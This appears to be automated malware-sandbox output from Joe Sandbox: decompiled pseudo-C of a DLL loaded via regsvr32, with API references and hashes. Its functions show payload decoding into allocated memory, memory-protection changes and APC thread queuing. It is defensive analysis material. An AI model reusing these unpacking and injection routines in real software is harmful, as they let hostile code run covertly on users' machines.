                                                                                                                                                                  				_Unknown_base(*)()* _v0;
                                                                                                                                                                  				void* _t4;
                                                                                                                                                                  				long _t6;
                                                                                                                                                                  				long _t11;
                                                                                                                                                                  				void* _t13;
                                                                                                                                                                  
                                                                                                                                                                  				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x67cd41cc, 0, _a12); // executed
                                                                                                                                                                  				_t13 = _t4;
                                                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                                                  					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                  					if(_t6 == 0) {
                                                                                                                                                                  						_t11 = GetLastError();
                                                                                                                                                                  						TerminateThread(_t13, _t11);
                                                                                                                                                                  						CloseHandle(_t13);
                                                                                                                                                                  						_t13 = 0;
                                                                                                                                                                  						SetLastError(_t11);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t13;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateThread.KERNELBASE ref: 67CD13E8
                                                                                                                                                                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 67CD13FD
                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 67CD1408
                                                                                                                                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 67CD1412
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 67CD1419
                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 67CD1422
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3832013932-0
                                                                                                                                                                  • Opcode ID: df27e56b54e35759147152a9266f096ef321604a721b19c1512151b81ba44779
                                                                                                                                                                  • Instruction ID: 88034a36f28b7adb32d5dd98446e458d3db652bce2e7d975cf7394aba728b42b
                                                                                                                                                                  • Opcode Fuzzy Hash: df27e56b54e35759147152a9266f096ef321604a721b19c1512151b81ba44779
                                                                                                                                                                  • Instruction Fuzzy Hash: 70F01536205621FBDB225BB48C4EF9FBF79FB0E751F058414FA0991150E729A810DBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstChangeNotificationA.KERNEL32 ref: 67D4EB7D
                                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000404,67DB9BC0), ref: 67D4EBDF
                                                                                                                                                                  • GetEnvironmentVariableA.KERNELBASE(67CD8140,67DBA1E8,00000404), ref: 67D4ECD9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChangeCurrentDirectoryEnvironmentFindFirstNotificationVariable
                                                                                                                                                                  • String ID: 3
                                                                                                                                                                  • API String ID: 2016254915-1842515611
                                                                                                                                                                  • Opcode ID: 4cac532767ed15912f274acf8a367432b5fd1eb72152982208fd09648001ec07
                                                                                                                                                                  • Instruction ID: 6cce265044d661f800366e98adb6e7243a1b943a9a3effd80605ae1fe85bf7e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 4cac532767ed15912f274acf8a367432b5fd1eb72152982208fd09648001ec07
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F71C2B1A06302DFEF14CF28C88561DB7A1BB9A328F488E2ED456D7344D33898898F55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E67CD18AD(void* __edi, intOrPtr _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				unsigned int _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                  				void* _v36;
                                                                                                                                                                  				signed int _v40;
                                                                                                                                                                  				signed char _v44;
                                                                                                                                                                  				void* _v48;
                                                                                                                                                                  				signed int _v56;
                                                                                                                                                                  				signed int _v60;
                                                                                                                                                                  				intOrPtr _t50;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				void* _t61;
                                                                                                                                                                  				signed int _t67;
                                                                                                                                                                  				signed char _t69;
                                                                                                                                                                  				signed char _t70;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                                  				unsigned int _t82;
                                                                                                                                                                  				intOrPtr _t86;
                                                                                                                                                                  				intOrPtr* _t89;
                                                                                                                                                                  				intOrPtr _t90;
                                                                                                                                                                  				void* _t91;
                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                  
                                                                                                                                                                  				_t90 =  *0x67cd41b0;
                                                                                                                                                                  				_t50 = E67CD1000(_t90,  &_v28,  &_v20);
                                                                                                                                                                  				_v24 = _t50;
                                                                                                                                                                  				if(_t50 == 0) {
                                                                                                                                                                  					asm("sbb ebx, ebx");
                                                                                                                                                                  					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
                                                                                                                                                                  					_t91 = _t90 + _v28;
                                                                                                                                                                  					_v48 = _t91;
                                                                                                                                                                  					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                  					_t76 = _t57;
                                                                                                                                                                  					_v36 = _t76;
                                                                                                                                                                  					if(_t76 == 0) {
                                                                                                                                                                  						_v24 = 8;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t69 = 0;
                                                                                                                                                                  						if(_t67 <= 0) {
                                                                                                                                                                  							_t77 =  *0x67cd41cc;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t86 = _a4;
                                                                                                                                                                  							_v8 = _t91;
                                                                                                                                                                  							_v8 = _v8 - _t76;
                                                                                                                                                                  							_t14 = _t86 + 0x67cd5137; // 0x3220a9c2
                                                                                                                                                                  							_t61 = _t57 - _t91 + _t14;
                                                                                                                                                                  							_v16 = _t76;
                                                                                                                                                                  							do {
                                                                                                                                                                  								asm("movsd");
                                                                                                                                                                  								asm("movsd");
                                                                                                                                                                  								asm("movsd");
                                                                                                                                                                  								_t70 = _t69 + 1;
                                                                                                                                                                  								_v44 = _t70;
                                                                                                                                                                  								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
                                                                                                                                                                  								if(_t82 != 0) {
                                                                                                                                                                  									_v32 = _v32 & 0x00000000;
                                                                                                                                                                  									_t89 = _v16;
                                                                                                                                                                  									_v12 = 0x400;
                                                                                                                                                                  									do {
                                                                                                                                                                  										_t93 =  *((intOrPtr*)(_v8 + _t89));
                                                                                                                                                                  										_v40 = _t93;
                                                                                                                                                                  										if(_t93 == 0) {
                                                                                                                                                                  											_v12 = 1;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											 *_t89 = _t93 + _v32 - _t82;
                                                                                                                                                                  											_v32 = _v40;
                                                                                                                                                                  											_t89 = _t89 + 4;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t33 =  &_v12;
                                                                                                                                                                  										 *_t33 = _v12 - 1;
                                                                                                                                                                  									} while ( *_t33 != 0);
                                                                                                                                                                  								}
                                                                                                                                                                  								_t69 = _v44;
                                                                                                                                                                  								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
                                                                                                                                                                  								_v16 = _v16 + 0x1000;
                                                                                                                                                                  								 *0x67cd41cc = _t77;
                                                                                                                                                                  							} while (_t69 < _t67);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t77 != 0x63699bc3) {
                                                                                                                                                                  							_v24 = 0xc;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							memcpy(_v48, _v36, _v20);
                                                                                                                                                                  						}
                                                                                                                                                                  						VirtualFree(_v36, 0, 0x8000); // executed
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v24;
                                                                                                                                                                  			}


                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 67CD1903
                                                                                                                                                                  • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 67CD19C9
                                                                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 67CD19E4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                  • String ID: Jun 6 2021
                                                                                                                                                                  • API String ID: 4010158826-1013970402
                                                                                                                                                                  • Opcode ID: d37ee69283b0bc120f3640d96a8b9b8a3fb8117aadbdd5177488f2faad12ecd8
                                                                                                                                                                  • Instruction ID: 6ad1bf1874b8ff066663a8559f3835197b6954e61da1f1338849c654b6a7e0e2
                                                                                                                                                                  • Opcode Fuzzy Hash: d37ee69283b0bc120f3640d96a8b9b8a3fb8117aadbdd5177488f2faad12ecd8
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F414C71E0021AAFDF04CF99C881AEEBBB6FF49310F258129DA0477244E775AA45CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E67CD20CE(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                  				long _t3;
                                                                                                                                                                  				int _t4;
                                                                                                                                                                  				int _t9;
                                                                                                                                                                  				void* _t13;
                                                                                                                                                                  
                                                                                                                                                                  				_t13 = GetCurrentThread();
                                                                                                                                                                  				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                  				if(_t3 != 0) {
                                                                                                                                                                  					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                  				}
                                                                                                                                                                  				_t4 = E67CD1C7D(_a4); // executed
                                                                                                                                                                  				_t9 = _t4;
                                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                                  					SetThreadPriority(_t13, _t4);
                                                                                                                                                                  				}
                                                                                                                                                                  				asm("lock xadd [eax], ecx");
                                                                                                                                                                  				return _t9;
                                                                                                                                                                  			}








                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 67CD20D1
                                                                                                                                                                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 67CD20DC
                                                                                                                                                                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 67CD20EF
                                                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 67CD2102
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452675757-0
                                                                                                                                                                  • Opcode ID: f7653ffe02f6b6ad367b1eab3aafb07f96c47021235b1a4d825349fdd7aad41b
                                                                                                                                                                  • Instruction ID: be1775ad948a796ae36fde9374231f8e8f563875c13b4c5c5a7e39d58fddbe7f
                                                                                                                                                                  • Opcode Fuzzy Hash: f7653ffe02f6b6ad367b1eab3aafb07f96c47021235b1a4d825349fdd7aad41b
                                                                                                                                                                  • Instruction Fuzzy Hash: B2E092713056116B96116B3D4CC5E6BABACDF96330B120235FB24D21D0EB589C09D5B9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 402 67da18f0-67da192a 403 67da192e-67da194e 402->403 404 67da192c-67da1973 call 67d4dc90 402->404 406 67da1978-67da19ba 403->406 404->406 408 67da19bc-67da1a0c 406->408 409 67da1a10-67da1add GetTempPathA VirtualProtect 406->409 408->409 411 67da1adf-67da1b1f 409->411 412 67da1b24-67da1b36 409->412 411->412 413 67da1b38-67da1b7b 412->413 414 67da1b7f-67da1bbf 412->414 413->414 415 67da1c2a 414->415 416 67da1bc1 414->416 415->415 417 67da1bce-67da1c25 416->417 418 67da1bc3-67da1bcc 416->418 417->415 418->415 418->417
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000404,67DA6410,?), ref: 67DA1A78
                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,0000311B,00000040,?), ref: 67DA1ACB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PathProtectTempVirtual
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 3422257996-2766056989
                                                                                                                                                                  • Opcode ID: 358c3bc56757671456a830546c22408d0e0d9fdd1a2505a6073efb6d00e7b4ec
                                                                                                                                                                  • Instruction ID: d506970311b348eafb48da1294f22db4420d9ab5a0a4dbe805d0a64ca9c1442f
                                                                                                                                                                  • Opcode Fuzzy Hash: 358c3bc56757671456a830546c22408d0e0d9fdd1a2505a6073efb6d00e7b4ec
                                                                                                                                                                  • Instruction Fuzzy Hash: 89A13DB0903104DBEB04CF69C482BADBBF1FB8A318F548A5AD126D7395D7385984CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 429 67cd126d-67cd12b0 VirtualProtect 430 67cd1345-67cd134c 429->430 431 67cd12b6-67cd12ba 429->431 431->430 432 67cd12c0-67cd12ca 431->432 433 67cd12cc-67cd12d6 432->433 434 67cd12e8-67cd12f2 432->434 435 67cd12d8-67cd12de 433->435 436 67cd12e0-67cd12e6 433->436 437 67cd12f4-67cd1304 434->437 438 67cd1306 434->438 439 67cd130c-67cd131f VirtualProtect 435->439 436->439 437->438 437->439 438->439 440 67cd132a-67cd133f 439->440 441 67cd1321-67cd1327 GetLastError 439->441 440->430 440->431 441->440
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E67CD126D(void* __eax, void* _a4) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				long _v20;
                                                                                                                                                                  				int _t43;
                                                                                                                                                                  				long _t54;
                                                                                                                                                                  				signed int _t57;
                                                                                                                                                                  				void* _t58;
                                                                                                                                                                  				signed int _t60;
                                                                                                                                                                  
                                                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                                                  				_t57 =  *0x67cd41cc;
                                                                                                                                                                  				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                  				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                  				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				if(_v16 <= 0) {
                                                                                                                                                                  					L12:
                                                                                                                                                                  					return _v12;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					goto L1;
                                                                                                                                                                  				}
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					_t60 = _v12;
                                                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                                                  						goto L12;
                                                                                                                                                                  					}
                                                                                                                                                                  					asm("bt [esi+0x24], eax");
                                                                                                                                                                  					if(_t60 >= 0) {
                                                                                                                                                                  						asm("bt [esi+0x24], eax");
                                                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                                                  							L8:
                                                                                                                                                                  							_t54 = _t57 - 0x63699bbf;
                                                                                                                                                                  							L9:
                                                                                                                                                                  							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                                                  							if(_t43 == 0) {
                                                                                                                                                                  								_v12 = GetLastError();
                                                                                                                                                                  							}
                                                                                                                                                                  							_v8 = _v8 + 1;
                                                                                                                                                                  							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                                                                                                                                  							if(_v8 < _v16) {
                                                                                                                                                                  								continue;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								goto L12;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						asm("bt [esi+0x24], eax");
                                                                                                                                                                  						_t54 = _t57 - 0x63699bc1;
                                                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L8;
                                                                                                                                                                  					}
                                                                                                                                                                  					asm("bt [esi+0x24], eax");
                                                                                                                                                                  					if(_t60 >= 0) {
                                                                                                                                                                  						_t54 = _t57 - 0x63699ba3;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t54 = _t57 - 0x63699b83;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  				goto L12;
                                                                                                                                                                  			}












                                                                                                                                                                  0x67cd130c
                                                                                                                                                                  0x67cd131b
                                                                                                                                                                  0x67cd131f
                                                                                                                                                                  0x67cd1327
                                                                                                                                                                  0x67cd1327
                                                                                                                                                                  0x67cd132f
                                                                                                                                                                  0x67cd1332
                                                                                                                                                                  0x67cd133f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd133f
                                                                                                                                                                  0x67cd12fa
                                                                                                                                                                  0x67cd12fe
                                                                                                                                                                  0x67cd1304
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1304
                                                                                                                                                                  0x67cd12d2
                                                                                                                                                                  0x67cd12d6
                                                                                                                                                                  0x67cd12e0
                                                                                                                                                                  0x67cd12d8
                                                                                                                                                                  0x67cd12d8
                                                                                                                                                                  0x67cd12d8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd12d6
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 67CD12A6
                                                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 67CD131B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 67CD1321
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1469625949-0
                                                                                                                                                                  • Opcode ID: a85e696e65b20edbc703e7b705442be9cff20fde7622d5ec18b95f6a24f0b6d0
                                                                                                                                                                  • Instruction ID: c1be862ebda3bee0ccdfd269bf8d6b1a2625da5fa3244b8254c3d043013770ac
                                                                                                                                                                  • Opcode Fuzzy Hash: a85e696e65b20edbc703e7b705442be9cff20fde7622d5ec18b95f6a24f0b6d0
                                                                                                                                                                  • Instruction Fuzzy Hash: D521813180020BEFCB14DFA9C881AAAF7F5FF08319F014859D61697584F3B8E694CB94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E67CD14E8() {
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				void _v44;
                                                                                                                                                                  				char _v48;
                                                                                                                                                                  				void* _v52;
                                                                                                                                                                  				long _t23;
                                                                                                                                                                  				int _t24;
                                                                                                                                                                  				void* _t28;
                                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                                  				signed int _t34;
                                                                                                                                                                  				intOrPtr _t36;
                                                                                                                                                                  
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push(0x67cd41c4);
                                                                                                                                                                  				_push(1);
                                                                                                                                                                  				_push( *0x67cd41d0 + 0x67cd5089);
                                                                                                                                                                  				 *0x67cd41c0 = 0xc;
                                                                                                                                                                  				 *0x67cd41c8 = 0; // executed
                                                                                                                                                                  				L67CD1DA8(); // executed
                                                                                                                                                                  				_t34 = 6;
                                                                                                                                                                  				memset( &_v44, 0, _t34 << 2);
                                                                                                                                                                  				if(E67CD1697( &_v44,  &_v28,  *0x67cd41cc ^ 0xfd7cd1cf) == 0) {
                                                                                                                                                                  					_t23 = 0xb;
                                                                                                                                                                  					L7:
                                                                                                                                                                  					ExitThread(_t23);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t24 = lstrlenW( *0x67cd41b8);
                                                                                                                                                                  				_t7 = _t24 + 2; // 0x2
                                                                                                                                                                  				_t10 = _t24 + _t7 + 8; // 0xa
                                                                                                                                                                  				_t28 = E67CD1144(_t36, _t10,  &_v48,  &_v52); // executed
                                                                                                                                                                  				if(_t28 == 0) {
                                                                                                                                                                  					_t30 = _v52;
                                                                                                                                                                  					 *_t30 = 0;
                                                                                                                                                                  					if( *0x67cd41b8 == 0) {
                                                                                                                                                                  						 *((short*)(_t30 + 4)) = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						E67CD2118(_t40, _t30 + 4);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_t23 = E67CD1444(_v44); // executed
                                                                                                                                                                  				goto L7;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,67CD41C4,00000000), ref: 67CD1519
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?), ref: 67CD154D
                                                                                                                                                                    • Part of subcall function 67CD1144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?,?), ref: 67CD1151
                                                                                                                                                                    • Part of subcall function 67CD1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 67CD1167
                                                                                                                                                                    • Part of subcall function 67CD1144: _snwprintf.NTDLL ref: 67CD118C
                                                                                                                                                                    • Part of subcall function 67CD1144: CreateFileMappingW.KERNELBASE(000000FF,67CD41C0,00000004,00000000,?,?), ref: 67CD11B1
                                                                                                                                                                    • Part of subcall function 67CD1144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?), ref: 67CD11C8
                                                                                                                                                                    • Part of subcall function 67CD1144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A), ref: 67CD11FD
                                                                                                                                                                  • ExitThread.KERNEL32 ref: 67CD159C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4209869662-0
                                                                                                                                                                  • Opcode ID: 6e88643053e1f3905edba2a621f5a7036b2dc65e07569fd328712c3769f5ceb7
                                                                                                                                                                  • Instruction ID: f87de784599a4417981167f3220383ce5ebbf9f0902fba42cca9d66e2d0b6221
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e88643053e1f3905edba2a621f5a7036b2dc65e07569fd328712c3769f5ceb7
                                                                                                                                                                  • Instruction Fuzzy Hash: 32117972104201ABDB01CB69C885E9BBBFCAB5A704F120A16FB15E7150F734E644CB96
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E67CD1ADB(void* __ecx) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				signed short _t15;
                                                                                                                                                                  				char* _t18;
                                                                                                                                                                  				char* _t25;
                                                                                                                                                                  				char* _t29;
                                                                                                                                                                  
                                                                                                                                                                  				_t22 = __ecx;
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_t25 = 0;
                                                                                                                                                                  				if(E67CD1697( &_v8,  &_v12,  *0x67cd41cc ^ 0x196db149) != 0) {
                                                                                                                                                                  					if(_v8 == 0) {
                                                                                                                                                                  						_t29 = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t29 = E67CD2087(_t22, _v8,  *0x67cd41cc ^ 0x6e49bbff);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t29 != 0) {
                                                                                                                                                                  						_t15 = E67CD1E8A(_t22); // executed
                                                                                                                                                                  						_v12 = _t15 & 0x0000ffff;
                                                                                                                                                                  						_t18 = StrStrIA(_t29,  &_v12); // executed
                                                                                                                                                                  						if(_t18 != 0) {
                                                                                                                                                                  							_t25 = 0x657;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					HeapFree( *0x67cd4190, 0, _v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t25;
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • StrStrIA.KERNELBASE(00000000,67CD1CE6,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1B32
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1B4C
                                                                                                                                                                  Memory Dump Source
